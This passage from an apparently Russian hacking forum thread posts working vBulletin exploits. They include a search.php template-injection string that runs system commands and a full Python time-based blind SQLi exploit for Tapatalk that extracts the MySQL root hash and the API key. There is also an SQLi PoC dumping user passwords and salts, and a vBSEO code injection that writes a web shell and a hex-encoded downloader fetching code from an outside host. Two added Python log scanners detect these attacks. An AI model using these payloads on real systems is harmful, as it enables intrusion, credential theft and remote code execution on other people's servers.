    search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query=%24%7b%40system('pwd')%7d&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthreadid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&titleonly=0&userid=0
    
    
    "query" param

    Code:
    inject : ${@system('put command here')}
     
    11 Dec 2013
  12. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    vBulletin Tapatalk - Blind SQL Injection


    Code:
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    '''
    @author: tintinweb 0x721427D8
    '''
    import urllib2, urllib
    import xmlrpclib,re, urllib2,string,itertools,time
    from distutils.version import LooseVersion
    
    
    class Exploit(object):
    def __init__(self, target, debug=0 ):
    self.stopwatch_start=time.time()
    self.target = target
    self.path = target
    self.debug=debug
    if not self.target.endswith("mobiquo.php"):
    self.path = self.detect_tapatalk()
    if not self.path:
    raise Exception("Could not detect tapatalk or version not supported!")
    self.rpc_connect()
    self.attack_func = self.attack_2
    
    def detect_tapatalk(self):
    # request page, check for tapatalk banner
    handlers = [
    urllib2.HTTPHandler(debuglevel=self.debug),
    urllib2.HTTPSHandler(debuglevel=self.debug),
    
    ]
    ua = urllib2.build_opener(*handlers)
    ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')]
    data = ua.open(self.target).read()
    if self.debug:
    print data
    if not "tapatalkDetect()" in data:
    print "[xx] could not detect tapatalk. bye..."
    return None
    
    # extract tapatalk version
    print "[ i] Taptalk detected ... ",
    path = "".join(re.findall(r"^\s*<link href=[\s'\"]?(http://.*?/)smartbanner/appbanner.css", data, re.MULTILINE|re.DOTALL))
    path+="mobiquo.php"
    print "'%s' ... "%path,
    data = urllib.urlopen(path).read()
    version = "".join(re.findall(r"Current Tapatalk plugin version:\s*([\d\.a-zA-Z]+)", data))
    if LooseVersion(version) <= LooseVersion("5.2.1"):
    print "v.%s :) - OK"%version 
    return path
    print "v.%s :( - not vulnerable"%version
    return None
    
    def rpc_connect(self):
    self.rpc = xmlrpclib.ServerProxy(self.path,verbose=self.debug)
    
    def attack_1(self, sqli, sleep=2):
    
    '''
    SELECT subscribethreadid
    FROM subscribethread AS subscribethread
    LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
    WHERE subscribethreadid = <INJECTION>
    AND subscribethreadid.userid = 0";
    
    <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
    '''
    
    query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
    query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0"
    
    if self.debug:
    print """ SELECT subscribethreadid
    FROM subscribethread AS subscribethread
    LEFT JOIN user AS user ON (user.userid=subscribethread.userid)
    WHERE subscribethreadid = %s
    AND subscribethread.userid = 0"""%query
    
    return self.rpc.unsubscribe_topic("s_%s"%query) #no escape, invalid_char="_"
    
    def attack_2(self, sqli, sleep=2):
    '''
    SELECT subscribeforumid
    FROM subscribeforum AS subscribeforum
    LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
    WHERE subscribeforumid = <INJECTION>
    AND subscribeforum.userid = 0";
    
    <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
    '''
    
    query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
    query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0"
    
    if self.debug:
    print """ SELECT subscribeforumid
    FROM subscribeforum AS subscribeforum
    LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
    WHERE subscribeforumid = %s
    AND subscribeforum.userid = 0"""%query
    
    return self.rpc.unsubscribe_forum("s_%s"%query) #no escape, invalid_char="_"
    
    def attack_blind(self,sqli,sleep=2):
    return self.attack_func(sqli,sleep=sleep)
    #return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli)
    
    def attack_blind_guess(self,query, column, charset=string.ascii_letters+string.digits,maxlength=32, sleep=2, case=True):
    '''
    provide <query> = select -1 from user where user='debian-sys-maint' where <COLUMN> <GUESS>
    '''
    
    
    hit = False
    # PHASE 1 - guess entry length
    print "[ ] trying to guess length ..."
    for guess_length in xrange(maxlength+1):
    q = query.replace("<COLUMN>","length(%s)"%column).replace("<GUESS>","= %s"%guess_length)
    
    self.stopwatch()
    self.attack_blind(q, sleep)
    duration = self.stopwatch()
    
    print ".",
    
    if duration >= sleep-sleep/8:
    # HIT! - got length! => guess_length
    hit = True
    print ""
    break
    
    if not hit:
    print "[ !!] unable to guess password length, check query!"
    return None
    
    
    print "[ *] LENGTH = %s"%guess_length
    
    # PHASE 2 - guess password up to length
    print "[ ] trying to guess value ..."
    hits = 0
    result = ""
    for pos in xrange(guess_length):
    # for each char pos in up to guessed length
    for attempt in self.bruteforce(charset, 1):
    # probe all chars in charset
    #attempt = re.escape(attempt)
    if attempt == "%%":
    attempt= "\%"
    #LIKE binary = case sensitive.might be better to do caseinsensitive search + recheck case with binary
    q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE '%s%s%%' "%(result,attempt))
    
    self.stopwatch()
    self.attack_blind(q, sleep)
    duration = self.stopwatch()
    
    #print result,attempt," ",duration
    print ".",
    if duration >= sleep-sleep/8:
    if case:
    # case insensitive hit - recheck case: this is drastically reducing queries needed.
    q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE binary '%s%s%%' "%(result,attempt.lower()))
    self.stopwatch()
    self.attack_blind(q, sleep)
    duration = self.stopwatch()
    if duration >= sleep-sleep/8:
    attempt = attempt.lower()
    else:
    attempt = attempt.upper()
    # case sensitive - end
    
    
    
    # HIT! - got length! => guess_length
    hits += 1
    print ""
    print "[ +] HIT! - %s[%s].."%(result,attempt)
    result += attempt
    break 
    
    if not hits==guess_length:
    print "[ !!] unable to guess password length, check query!"
    return None
    
    print "[ *] SUCCESS!: query: %s"%(query.replace("<COLUMN>",column).replace("<GUESS>","='%s'"%result)) 
    return result 
    
    def bruteforce(self, charset, maxlength):
    return (''.join(candidate)
    for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
    for i in range(1, maxlength + 1)))
    
    def stopwatch(self):
    stop = time.time()
    diff = stop - self.stopwatch_start
    self.stopwatch_start=stop
    return diff
    
    if __name__=="__main__":
    #googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start
    DEBUG = False
    TARGET = "http://TARGET/vbb4/forum.php"
    x = Exploit(TARGET,debug=DEBUG)
    
    print "[ ] TAPATALK for vBulletin 4.x - SQLi"
    print "[--] Target: %s"%TARGET
    if DEBUG: print "[--] DEBUG-Mode!" 
    
    print "[ +] Attack - sqli"
    
    
    query = u"-1 UNION SELECT 1%s"%unichr(0)
    if DEBUG:
    print u""" SELECT subscribeforumid
    FROM subscribeforum AS subscribeforum
    LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
    WHERE subscribeforumid = %s
    AND subscribeforum.userid = 0"""%query
    
    
    print "[ *] guess mysql user/pass"
    print x.attack_blind_guess("select -1 from mysql.user where user='root' and <COLUMN> <GUESS>", 
    column="password",
    charset="*"+string.hexdigits,
    maxlength=45) # usually 40 chars + 1 (*)
    
    print "[ *] guess apikey"
    print x.attack_blind_guess("select -1 from setting where varname='apikey' and <COLUMN> <GUESS>",
    column='value',
    charset=string.ascii_letters+string.digits,
    maxlength=14,
    )
    
    print "-- done --"
     
    30 Oct 2014
  13. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection
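The probe above works by making the database sleep() and timing the reply, so the server-side trace is a burst of unusually slow mobiquo.php XML-RPC calls from a single client. The following is an added example (not part of tintinweb's code or of this thread) that flags that pattern from a request-time log; the nginx log format, the thresholds and the sample lines are assumptions, and the sample traffic is constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Assumed nginx log_format: '$remote_addr [$time_local] "$request" $status $request_time'
LINE_RE = re.compile(r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d{3} (?P<secs>[\d.]+)$')
SLOW_S = 1.5                  # the probe sleeps 2 s per request; normal mobiquo calls finish far faster
MIN_SLOW = 10                 # slow XML-RPC calls from one client inside WINDOW before alerting
WINDOW = timedelta(minutes=5)

def parse(line):
    """Parse one log line into (ip, timestamp, path, seconds); None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return (m["ip"], datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), m["path"], float(m["secs"]))

def find_blind_probes(lines):
    """Return {ip: max slow mobiquo.php calls seen inside one WINDOW} for clients exceeding MIN_SLOW."""
    slow = defaultdict(list)
    for rec in map(parse, lines):
        if rec and rec[2].endswith("mobiquo.php") and rec[3] >= SLOW_S:
            slow[rec[0]].append(rec[1])
    alerts = {}
    for ip, times in slow.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):            # sliding window over the sorted timestamps
            while t - times[start] > WINDOW:
                start += 1
            if end - start + 1 >= MIN_SLOW:
                alerts[ip] = max(alerts.get(ip, 0), end - start + 1)
    return alerts

def constructed_log():
    """Constructed sample: one client running a sleep-based probe, two clients with ordinary traffic."""
    t0 = datetime(2014, 10, 30, 9, 0, 0, tzinfo=timezone.utc)
    fmt = lambda t: t.strftime("%d/%b/%Y:%H:%M:%S %z")
    lines = [f'198.51.100.20 [{fmt(t0 + timedelta(seconds=3 * i))}] "POST /forum/mobiquo/mobiquo.php HTTP/1.1" 200 2.1{i % 10}'
             for i in range(40)]                   # 40 probes, each about 2.1 s, 3 s apart
    lines += [f'203.0.113.8 [{fmt(t0 + timedelta(seconds=7 * i))}] "POST /forum/mobiquo/mobiquo.php HTTP/1.1" 200 0.0{i % 9 + 1}'
              for i in range(40)]                  # a genuine Tapatalk client: fast calls only
    lines.append(f'192.0.2.3 [{fmt(t0)}] "POST /forum/mobiquo/mobiquo.php HTTP/1.1" 200 2.400')  # one slow call, no alert
    return lines

if __name__ == "__main__":
    for ip, count in find_blind_probes(constructed_log()).items():
        print(f"possible time-based blind SQLi via mobiquo.php from {ip}: {count} slow calls")
```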


    Code:
    #Title: vBulletin Verify Email Before Registration Plugin - SQL Injection
    #Date: September 19 2014
    #Version: Any vBulletin 4.*.* version which has the plugin installed.
    #Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164
    #Author: Dave (FW/FG)
     
    The vulnerability resides in the register_form_complete hook, and some 
    other hooks.
    The POST/GET data is not sanitized before being used in queries.
     
    SQL injection at:
    http://example.com/register.php?so=1&emailcode=[sqli]
     
    PoC:
    http://example.com/register.php?so=1&emailcode=1' UNION SELECT null, 
    concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM 
    user WHERE userid = '1
     
    Now look at the source of the page and find:
    <input type="text" style="display: none" name="email" id="email" 
    maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
    <input type="text" style="display: none" name="emailconfirm" id="email" 
    maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
     
    Vulnerable hooks:
    profile_updatepassword_complete (Email field when you want to change 
    your email address after being logged in.)
    register_addmember_complete (After submitting the final registration form.)
    register_addmember_process
    register_form_complete (This example)
    register_start (Email confirmation form at register.php)
     
    30 Oct 2014
  14. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability


    Code:
    #################################################################################################################
    [+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
    [+] Discovered By: Dariush Nasirpour (Net.Edit0r)
    [+] My Homepage: black-hg.org / nasirpour.info
    [+] Date: [2015 27 February]
    [+] Vendor Homepage: vBulletin.com
    [+] Tested on: [vBulletin 4.2.2]
    [+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg )
    #################################################################################################################
    Remote Code Injection:
    +++++++++++++++++++++++++
    1) You Must Register In The vBulletin http://server/register.php example:[blackhat]
    
    2) go to your user profile example: [http://server/members/blackhat.html]
    
    3) post something in visitor message and record post data with live http header
    
    [example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=
    1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
    
    4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin don't let you send same comment in a time]
    
    [Now post this with hackbar:]
    
    URL: http://server/visitormessage.php?do=message
    
    [Post data]
    message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=
    1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
    
    [And referrer data:] 
    PoC : http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]
    
    [Example referrer data:] > upload downloader.php and s.php
    PoC : http://server/members/g3n3rall.html?a=$stylevar%5b$%7b$%7bfile_put_contents(
    "downloader.php","\x3C\x3F\x70\x68\x70\x0D\x0A\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x20\x3D\x20\x66\x69\x6C\x65\x5F\x67\x65\x74\x5F\x63\x6F\x6E\x74\x65\x6E\x74\x73\x28\x27\x68\x74\x74\x70\x3A\x2F\x2F\x70\x61\x69\x65\x6E\x63\x68\x61\x74\x2E\x63\x6F\x6D\x2F\x64\x2F\x64\x72\x2E\x74\x78\x74\x27\x29\x3B\x0D\x0A\x24\x66\x20\x3D\x20\x66\x6F\x70\x65\x6E\x28\x27\x73\x2E\x70\x68\x70\x27\x2C\x27\x77\x27\x29\x3B\x0D\x0A\x66\x77\x72\x69\x74\x65\x28\x24\x66\x2C\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x29\x3B\x0D\x0A\x3F\x3E")}}]
    
    5- Open hackbar and tamper it with taper data:
    referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]
    
    and submit request.
    
    ################################################################################################################
     
    23 Mar 2015
    1 person likes this.
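A defender-side complement to the PoCs in posts 10, 11, 13 and 14 above: an added example, not from this thread or any of the exploit authors, that scans combined-format access logs for the request and Referer patterns those PoCs leave behind (the template-eval `${@...(` and `$stylevar[` payloads, `UNION SELECT` in `emailcode`, `sleep()` probes, and POSTs to the leftover `install/upgrade.php`). The log lines, IPs and hostname are constructed.

```python
import re
from urllib.parse import unquote_plus
# Apache/nginx "combined" log format: client, time, request line, status, size, referer, user agent.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$')

# Indicators taken from the PoCs in this thread, matched on the URL-decoded target and Referer.
INDICATORS = [
    ("template_eval",  re.compile(r"\$\{\s*@?[a-z_]+\s*\("), ("target", "referer")),  # ${@system('pwd')}
    ("vbseo_stylevar", re.compile(r"\$stylevar\s*\["), ("target", "referer")),        # $stylevar[${${...}}]
    ("union_select",   re.compile(r"union\s+(all\s+)?select", re.I), ("target",)),    # emailcode=1' UNION SELECT
    ("sleep_probe",    re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I), ("target",)),    # time-based blind probes
    ("upgrade_script", re.compile(r"/install/upgrade\.php\b", re.I), ("target",)),    # leftover installer
]
def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads (%2524 -> %24 -> $) are still seen."""
    for _ in range(rounds):
        new = unquote_plus(value)
        if new == value:
            break
        value = new
    return value

def scan_line(line):
    """Return (client_ip, [(indicator, field), ...]) for one log line; (None, []) if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None, []
    decoded = {"target": decode(m["target"]), "referer": decode(m["referer"])}
    hits = [(name, field) for name, rx, fields in INDICATORS
            for field in fields if rx.search(decoded[field])]
    return m["ip"], hits

def scan_log(lines):
    """Map each client IP to the set of indicators it triggered anywhere in the log."""
    findings = {}
    for line in lines:
        ip, hits = scan_line(line)
        for name, _ in hits:
            findings.setdefault(ip, set()).add(name)
    return findings

# Constructed sample lines (not from any real server) mirroring the thread's PoCs; IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Dec/2013:10:01:02 +0000] "GET /search.php?query=%24%7b%40system(%27pwd%27)%7d&searchtype=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Dec/2013:10:01:09 +0000] "GET /register.php?so=1&emailcode=1%27%20UNION%20SELECT%20null,concat(username,0x3a,password),null%20FROM%20user%20WHERE%20userid=%271 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Feb/2015:14:20:33 +0000] "POST /visitormessage.php?do=message HTTP/1.1" 200 300 "http://forum.example/members/blackhat.html?a=$stylevar%5b$%7b$%7bfile_put_contents(%22shell.php%22,%22x%22)%7d%7d%5d" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Feb/2015:14:21:00 +0000] "POST /install/upgrade.php HTTP/1.1" 200 120 "-" "curl/7.30"',
    '192.0.2.9 - - [27/Feb/2015:14:25:00 +0000] "GET /forum.php HTTP/1.1" 200 45000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, names in sorted(scan_log(SAMPLE_LOG).items()):
        print(f"{ip}: {', '.join(sorted(names))}")
```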
